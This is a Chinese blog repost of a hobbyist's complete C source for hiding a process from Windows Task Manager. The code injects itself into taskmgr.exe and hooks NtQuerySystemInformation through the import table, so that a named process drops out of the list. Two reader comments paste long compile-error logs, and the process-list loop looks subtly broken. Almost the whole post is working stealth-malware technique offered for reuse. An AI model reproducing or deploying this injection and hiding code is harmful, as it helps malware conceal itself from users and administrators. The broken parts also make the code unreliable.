greatws
C/C++/VC++——不怕做不到，只怕想不到
Email:greatws # 163.com
QQ:34607100

隨筆-16 評(píng)論-116 文章-0 trackbacks-0

原文：http://blog.csdn.net/dalixux/archive/2008/10/14/3072436.aspx

使用代碼注入來(lái)實(shí)現(xiàn)進(jìn)程隱藏而不是使用DLL注入來(lái)實(shí)現(xiàn)進(jìn)程隱藏
沒(méi)有什么高級(jí)技術(shù) 純體力活原理就不說(shuō)了只是沒(méi)有通過(guò)DLL注入來(lái)實(shí)現(xiàn)HOOK API
從核心編程以來(lái) 似乎一提到C注入就是DLL注入很奇怪為什么沒(méi)人寫個(gè)完整的代碼注入
所以自己動(dòng)手寫了下
純粹注入代碼邪惡二進(jìn)制上也有個(gè)代碼注入的只是用了一個(gè)未公開(kāi)的函數(shù)，我還看不懂
= =本來(lái)想用匯編寫的發(fā)現(xiàn)匯編注入代碼遠(yuǎn)比C注入代碼來(lái)的繁所以用C實(shí)現(xiàn)了
主要功能就是隱藏進(jìn)程不過(guò)RING3的似乎沒(méi)多大用練習(xí)而已
代碼如下：

//需要編譯成release版本 DEBUG版本對(duì)函數(shù)生成的跳轉(zhuǎn)地址表

//jmp xxxxx 寫入遠(yuǎn)程進(jìn)程的時(shí)候xxxxx等于寫入了一個(gè)全局變量

// 程序必然崩潰

#include "Iat_Hook.h"

char cPath[] = "taskmgr.exe";

void main(void)

{

//定義變量

DWORD dwPid;

HANDLE hProcess;

DWORD dwSize = 2048;

PVOID pRemoteAddress, pRemoteStructAddress,MyAddress;

REMOTESTRUCT stRemoteStruct;

//遍歷進(jìn)程尋找taskmgr.exe進(jìn)程ID

dwPid = GetProcessPid(cPath);

// open process 得到進(jìn)程句柄

hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);

if(hProcess == NULL)

{

printf("open error code %d\n",GetLastError());

return;

}

//寫入替代函數(shù)

MyAddress = VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

WriteProcessMemory(hProcess, MyAddress, myNtQuerySystemInformation, dwSize, NULL);

//初始化結(jié)構(gòu)

InitializeStruct(&stRemoteStruct, (DWORD)MyAddress, dwPid);

//寫入結(jié)構(gòu)

pRemoteStructAddress = VirtualAllocEx(hProcess, NULL, sizeof(REMOTESTRUCT), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

WriteProcessMemory(hProcess, pRemoteStructAddress, &stRemoteStruct, sizeof(REMOTESTRUCT), NULL);

//寫入遠(yuǎn)程線程函數(shù)

pRemoteAddress = VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

WriteProcessMemory(hProcess, pRemoteAddress, RemoteThread, dwSize, NULL);

//創(chuàng)建遠(yuǎn)程線程

CreateRemoteThread(hProcess, NULL, 0, pRemoteAddress,pRemoteStructAddress, 0, 0);

CloseHandle(hProcess);

}

DWORD __stdcall RemoteThread(PREMOTESTRUCT pRemoteStruct)

{

FARPROC fpVirtualQuery;

FARPROC fpVirtualProtect;

FARPROC fpOpenProcess;

FARPROC fpEnum;

FARPROC fpGetProcAddress;

FARPROC fpLoadLibrary;

FARPROC fpFreeLibrary;

FARPROC fpWriteMemory;

FARPROC fplstrcmp;

HANDLE hProcess = NULL;

HMODULE hMods[256];

DWORD dwNeed;

HANDLE hPsapi;

MEMORY_BASIC_INFORMATION stMem;

HMODULE hKernel, hModule;

PIMAGE_NT_HEADERS pImageNtHeaders;

PIMAGE_OPTIONAL_HEADER pImageOptionalHeader;

IMAGE_DATA_DIRECTORY ImageImport;

PIMAGE_IMPORT_DESCRIPTOR pImageImportDescriptor;

PIMAGE_THUNK_DATA pImageThunkData;

DWORD oldProtect;

wchar_t *p = pRemoteStruct->cProcessName;

//初始化函數(shù)指針

fpVirtualQuery = (FARPROC)pRemoteStruct->dwVirtualQuery;

fpVirtualProtect = (FARPROC)pRemoteStruct->dwVirtualProtect;

fpOpenProcess = (FARPROC)pRemoteStruct->dwOpenProcess;

fpLoadLibrary = (FARPROC)pRemoteStruct->dwLoadLibrary;

fpFreeLibrary = (FARPROC)pRemoteStruct->dwFreeLibrary;

fpGetProcAddress = (FARPROC)pRemoteStruct->dwGetProcAddress;

fpWriteMemory = (FARPROC)pRemoteStruct->dwWriteProcessMemory;

fplstrcmp = (FARPROC)pRemoteStruct->dwlstrcmp;

//得到進(jìn)程句柄

hProcess =(HANDLE)fpOpenProcess(PROCESS_ALL_ACCESS, FALSE, pRemoteStruct->dwPid);

if(!hProcess)

return 0;

//得到模塊基址模塊基址存放于hMods[0]

hPsapi = (HANDLE)fpLoadLibrary(pRemoteStruct->cDllName);

fpEnum = (FARPROC)fpGetProcAddress(hPsapi, pRemoteStruct->cFunName);

fpEnum(hProcess, hMods, sizeof(hMods), &dwNeed);

fpFreeLibrary(hPsapi);

hModule = hMods[0];

//改變內(nèi)存屬性因?yàn)椴捎玫牟皇荄LL插入 NtQuerySystemInformation的原始地址無(wú)法通過(guò)

//全局變量傳遞給替代函數(shù) 這里通過(guò)把函數(shù)地址寫入kernel的PE頭來(lái)實(shí)現(xiàn) 這樣只需要在替代函數(shù)中讀出地址就可以了

hKernel = (HANDLE)fpLoadLibrary(pRemoteStruct->cKernel);

fpVirtualQuery(hKernel,&stMem, sizeof (MEMORY_BASIC_INFORMATION));

fpVirtualProtect(stMem.BaseAddress, stMem.RegionSize, PAGE_READWRITE, &stMem.Protect);

fpWriteMemory(hProcess, (PBYTE)(hKernel)+4, &pRemoteStruct->dwNtQuerySystem, sizeof(DWORD), NULL);

fpWriteMemory(hProcess, (PBYTE)(hKernel)+8, &pRemoteStruct->dwlstrcmpW, sizeof(DWORD), NULL);

fpWriteMemory(hProcess, (PBYTE)(hKernel)+0x14, &p, sizeof(DWORD), NULL);

fpVirtualProtect(stMem.BaseAddress, stMem.RegionSize, stMem.Protect, &oldProtect);

//查找導(dǎo)入表找到存放NtQuerySystemInformation

pImageNtHeaders = (PIMAGE_NT_HEADERS)((DWORD)*((PBYTE)hModule+0x3c) + (DWORD)hModule);

pImageOptionalHeader = &pImageNtHeaders->OptionalHeader;

ImageImport = pImageOptionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];

pImageImportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)(ImageImport.VirtualAddress + (DWORD)hModule);

while(pImageImportDescriptor->Name)

{

if(0 == fplstrcmp(pRemoteStruct->cNtdll, (PSTR)(pImageImportDescriptor->Name + (DWORD)hModule)))

{

break;

}

pImageImportDescriptor++;

}

//替換 NtQuerySystemInformation的地址

pImageThunkData = (PIMAGE_THUNK_DATA)(pImageImportDescriptor->FirstThunk + (DWORD)hModule);

while(pImageThunkData->u1.Function)

{

if(pImageThunkData->u1.Function == pRemoteStruct->dwNtQuerySystem)

{

fpVirtualQuery(&pImageThunkData->u1.Function, &stMem, sizeof (MEMORY_BASIC_INFORMATION));

fpVirtualProtect(stMem.BaseAddress, stMem.RegionSize, PAGE_READWRITE, &stMem.Protect);

pImageThunkData->u1.Function = pRemoteStruct->dwMyAddress;

break;

}

pImageThunkData++;

}

fpVirtualProtect(stMem.BaseAddress, stMem.RegionSize, stMem.Protect, &oldProtect);

return 0;

}

NTSTATUS WINAPI myNtQuerySystemInformation (

SYSTEM_INFORMATION_CLASS SystemInformationClass,

PVOID SystemInformation,

ULONG SystemInformationLength,

PULONG ReturnLength)

{

HANDLE hKernel;

NTSTATUS ntStatus;

wchar_t *pName;

PSYSTEM_PROCESS_INFORMATION pCurrent, pForward;

FARPROC fpNtQuerySystem;

FARPROC fplstrcmpW;

//尋找kernel32的基址準(zhǔn)備讀取需要用到的函數(shù)地址

_asm

{

mov eax,fs:[0x30]

mov eax,[eax+0xc]

mov ecx,[eax+0x1c]

mov ecx, [ecx]

mov eax, [ecx+8]

mov hKernel,eax

}

//取得函數(shù)地址

fpNtQuerySystem = *(FARPROC *)((DWORD)hKernel + 4);

fplstrcmpW = *(FARPROC *)((DWORD)hKernel + 8);

//取得需隱藏的進(jìn)程名

pName = *(wchar_t **)((DWORD)hKernel + 0x14);

ntStatus = (NTQUERYSYSTEMINFORMATION)fpNtQuerySystem(SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength);

if (SystemProcessesAndThreadsInformation == SystemInformationClass)

{

pForward = NULL;

pCurrent = (PSYSTEM_PROCESS_INFORMATION)SystemInformation;

while(pCurrent->NextEntryDelta)//檢驗(yàn)是否到最后一個(gè)進(jìn)程結(jié)構(gòu)

{

if(pCurrent->ProcessName.Buffer)

{

//_asm int 3

if(0 == fplstrcmpW(pCurrent->ProcessName.Buffer, pName))

{

if(pForward)

{

if(pCurrent->NextEntryDelta)//隱藏的進(jìn)程在鏈表中間

{

pForward->NextEntryDelta += pCurrent->NextEntryDelta;

}

else//隱藏的進(jìn)程在鏈表末端

pForward->NextEntryDelta = 0;

}

else //要隱藏的進(jìn)程在鏈表頭時(shí)

{

if(pCurrent->NextEntryDelta)

{

SystemInformation = (PBYTE)pCurrent + pCurrent->NextEntryDelta;

}

else

SystemInformation = NULL;

}

pForward = pCurrent;

pCurrent = (PSYSTEM_PROCESS_INFORMATION)(pCurrent->NextEntryDelta + (PBYTE)pForward);

}

//_asm int 3

}

return ntStatus;

}

//得到進(jìn)程PID

DWORD GetProcessPid(char *cPath)

{

PROCESSENTRY32 stProcess;

HANDLE hSnap;

BOOL bRet;

hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

if(hSnap == INVALID_HANDLE_VALUE)

{

printf("error\n");

return 0;

}

stProcess.dwSize = sizeof (PROCESSENTRY32);

bRet = Process32First(hSnap, &stProcess);

if(!bRet)

{

printf("first error\n");

return 0;

}

do

{

if(0 == strcmp(stProcess.szExeFile, cPath)) //find process of target

{

break;

}

}while(Process32Next(hSnap, &stProcess));

//確認(rèn) 是否找到目標(biāo)進(jìn)程

if(0 != strcmp(stProcess.szExeFile, "taskmgr.exe"))

{

printf("can not find process\n");

return 0;

}

CloseHandle(hSnap);

return stProcess.th32ProcessID;

}

VOID InitializeStruct(PREMOTESTRUCT pRemoteStruct, DWORD MyAddress, DWORD dwPid)

{

HANDLE hNtdll;

HANDLE hKernel;

hNtdll = LoadLibrary("ntdll.dll");

pRemoteStruct->dwNtQuerySystem = (DWORD)GetProcAddress(hNtdll, "NtQuerySystemInformation");

FreeLibrary(hNtdll);

hKernel = LoadLibrary("kernel32.dll");

pRemoteStruct->dwVirtualProtect = (DWORD)GetProcAddress(hKernel, "VirtualProtect");

pRemoteStruct->dwVirtualQuery = (DWORD)GetProcAddress(hKernel, "VirtualQuery");

pRemoteStruct->dwOpenProcess = (DWORD)GetProcAddress(hKernel, "OpenProcess");

pRemoteStruct->dwGetProcAddress = (DWORD)GetProcAddress(hKernel, "GetProcAddress");

pRemoteStruct->dwFreeLibrary = (DWORD)GetProcAddress(hKernel, "FreeLibrary");

pRemoteStruct->dwLoadLibrary = (DWORD)GetProcAddress(hKernel, "LoadLibraryA");

pRemoteStruct->dwWriteProcessMemory = (DWORD)GetProcAddress(hKernel, "WriteProcessMemory");

pRemoteStruct->dwlstrcmp = (DWORD)GetProcAddress(hKernel, "lstrcmpA");

pRemoteStruct->dwlstrcmpW = (DWORD)GetProcAddress(hKernel, "lstrcmpW");

FreeLibrary(hKernel);

pRemoteStruct->dwMyAddress = MyAddress;

pRemoteStruct->dwPid = dwPid;

strcpy(pRemoteStruct->cDllName, "Psapi.dll");

strcpy(pRemoteStruct->cFunName, "EnumProcessModules");

strcpy(pRemoteStruct->cKernel,"Kernel32.dll");

strcpy(pRemoteStruct->cNtdll, "ntdll.dll");

//要隱藏的進(jìn)程名

wcscpy(pRemoteStruct->cProcessName, L"explorer.exe");

}

Iat_Hook.h

//頭文件

#include <windows.h>

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <tlhelp32.h>

#include <imagehlp.h>

#include "Winternl.h"

#pragma comment(lib, "imagehlp")

//類型聲明

typedef int NTSTATUS;

typedef BOOL (__stdcall *ENUMPROCESSMODULES)(

HANDLE hProcess,

HMODULE* lphModule,

DWORD cb,

LPDWORD lpcbNeeded

);

typedef NTSTATUS (WINAPI *NTQUERYSYSTEMINFORMATION)(

SYSTEM_INFORMATION_CLASS SystemInformationClass,

PVOID SystemInformation,

ULONG SystemInformationLength,

PULONG ReturnLength

);

typedef struct _REMOTE_STRUCT

{

DWORD dwNtQuerySystem;

DWORD dwVirtualQuery;

DWORD dwVirtualProtect;

DWORD dwOpenProcess;

DWORD dwMessageBox;

DWORD dwLoadLibrary;

DWORD dwGetProcAddress;

DWORD dwFreeLibrary;

DWORD dwWriteProcessMemory;

DWORD dwlstrcmp;

DWORD dwlstrcmpW;

DWORD dwEnum;

DWORD dwMyAddress;

DWORD dwPid;

char cDllName[50];

char cFunName[50];

char cKernel[50];

char cNtdll[50];

wchar_t cProcessName[50];//要隱藏的進(jìn)程名

}REMOTESTRUCT, *PREMOTESTRUCT;

//函數(shù)聲明

DWORD GetProcessPid(char *cPath);

DWORD __stdcall RemoteThread(PREMOTESTRUCT pRemoteStruct);

VOID InitializeStruct(PREMOTESTRUCT pRemoteStruct, DWORD MyAddress, DWORD dwPid);

NTSTATUS WINAPI myNtQuerySystemInformation (

SYSTEM_INFORMATION_CLASS SystemInformationClass,

PVOID SystemInformation,

ULONG SystemInformationLength,

PULONG ReturnLength);

Winternl.h

typedef struct _UNICODE_STRING {

USHORT Length;

USHORT MaximumLength;

PWSTR Buffer; //注意，這里為Unicode類型

} UNICODE_STRING, *PUNICODE_STRING;

typedef enum _SYSTEM_INFORMATION_CLASS {

SystemBasicInformation,

SystemProcessorInformation,

SystemPerformanceInformation,

SystemTimeOfDayInformation,

SystemNotImplemented1,

SystemProcessesAndThreadsInformation,

SystemCallCounts,

SystemConfigurationInformation,

SystemProcessorTimes,

SystemGlobalFlag,

SystemNotImplemented2,

SystemModuleInformation,

SystemLockInformation,

SystemNotImplemented3,

SystemNotImplemented4,

SystemNotImplemented5,

SystemHandleInformation,

SystemObjectInformation,

SystemPagefileInformation,

SystemInstructionEmulationCounts,

SystemInvalidInfoClass1,

SystemCacheInformation,

SystemPoolTagInformation,

SystemProcessorStatistics,

SystemDpcInformation,

SystemNotImplemented6,

SystemLoadImage,

SystemUnloadImage,

SystemTimeAdjustment,

SystemNotImplemented7,

SystemNotImplemented8,

SystemNotImplemented9,

SystemCrashDumpInformation,

SystemExceptionInformation,

SystemCrashDumpStateInformation,

SystemKernelDebuggerInformation,

SystemContextSwitchInformation,

SystemRegistryQuotaInformation,

SystemLoadAndCallImage,

SystemPrioritySeparation,

SystemNotImplemented10,

SystemNotImplemented11,

SystemInvalidInfoClass2,

SystemInvalidInfoClass3,

SystemTimeZoneInformation,

SystemLookasideInformation,

SystemSetTimeSlipEvent,

SystemCreateSession,

SystemDeleteSession,

SystemInvalidInfoClass4,

SystemRangeStartInformation,

SystemVerifierInformation,

SystemAddVerifier,

SystemSessionProcessesInformation

} SYSTEM_INFORMATION_CLASS;

typedef struct _SYSTEM_PROCESS_INFORMATION

{

DWORD NextEntryDelta;

DWORD dThreadCount;

DWORD dReserved01;

DWORD dReserved02;

DWORD dReserved03;

DWORD dReserved04;

DWORD dReserved05;

DWORD dReserved06;

FILETIME ftCreateTime; /* relative to 01-01-1601 */

FILETIME ftUserTime; /* 100 nsec units */

FILETIME ftKernelTime; /* 100 nsec units */

UNICODE_STRING ProcessName; //這就是進(jìn)程名

DWORD BasePriority;

DWORD dUniqueProcessId; //進(jìn)程ID

DWORD dParentProcessID;

DWORD dHandleCount;

DWORD dReserved07;

DWORD dReserved08;

DWORD VmCounters;

DWORD dCommitCharge;

PVOID ThreadInfos[1];

} SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION;

后記：第一次沒(méi)有照著書(shū) 打代碼也找不到C 注入代碼的例子能找到的都是DLL注入原理早就知道了真的寫一遍不容易整個(gè)編寫的過(guò)程碰到了很多問(wèn)題最終都解決了輕松了

posted on 2008-10-14 13:36 greatws 閱讀(3548) 評(píng)論(2) 編輯收藏引用

評(píng)論:

# re: 代碼注入 API HOOK(非DLL)[轉(zhuǎn)] 2009-10-31 08:17 | hurong09@163.com

--------------------Configuration: CodeInject - Win32 Debug--------------------
Compiling...
Main.cpp
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(45) : error C2664: 'CreateRemoteThread' : cannot convert parameter 4 from 'void *' to 'unsigned long (__stdcall *)(void *)'
Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(86) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(91) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(92) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(93) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(94) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(99) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(100) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(101) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(102) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(103) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(104) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(105) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(115) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(125) : error C2446: '==' : no conversion from 'unsigned long' to 'unsigned long *'
Conversion from integral type to pointer type requires reinterpret_cast, C-style cast or function-style cast
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(125) : error C2040: '==' : 'unsigned long *' differs in levels of indirection from 'unsigned long'
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(127) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(128) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(129) : error C2440: '=' : cannot convert from 'unsigned long' to 'unsigned long *'
Conversion from integral type to pointer type requires reinterpret_cast, C-style cast or function-style cast
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp 回復(fù) 更多評(píng)論

# re: 代碼注入 API HOOK(非DLL)[轉(zhuǎn)] 2009-10-31 08:18 | hurong09@163.com

(134) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(168) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(178) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(252) : error C2664: 'GetProcAddress' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(253) : error C2664: 'FreeLibrary' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(256) : error C2664: 'GetProcAddress' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(257) : error C2664: 'GetProcAddress' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(258) : error C2664: 'GetProcAddress' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(259) : error C2664: 'GetProcAddress' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(260) : error C2664: 'GetProcAddress' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(261) : error C2664: 'GetProcAddress' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(262) : error C2664: 'GetProcAddress' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(263) : error C2664: 'GetProcAddress' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(264) : error C2664: 'GetProcAddress' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(265) : error C2664: 'FreeLibrary' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
Conversion from 'void*' to pointer to non-'void' requires an explicit cast
Ö´ÐÐ cl.exe Ê±³ö´í.

CodeInject.exe - 1 error(s), 0 warning(s) 回復(fù) 更多評(píng)論

刷新評(píng)論列表

只有注冊(cè)用戶登錄后才能發(fā)表評(píng)論。
【推薦】100%開(kāi)源！大型工業(yè)跨平臺(tái)軟件C++源碼提供，建模，組態(tài)！



網(wǎng)站導(dǎo)航: 博客園 IT新聞 BlogJava 博問(wèn) Chat2DB 管理

<

2008年10月

>

日

一

二

三

四

五

六

28

29

30

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

1

2

3

4

5

6

7

8

常用鏈接

留言簿(8)

隨筆檔案

積分與排名

積分 - 82676
排名 - 291

青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

常用鏈接

留言簿(8)

隨筆檔案

積分與排名

最新評(píng)論

評(píng)論排行榜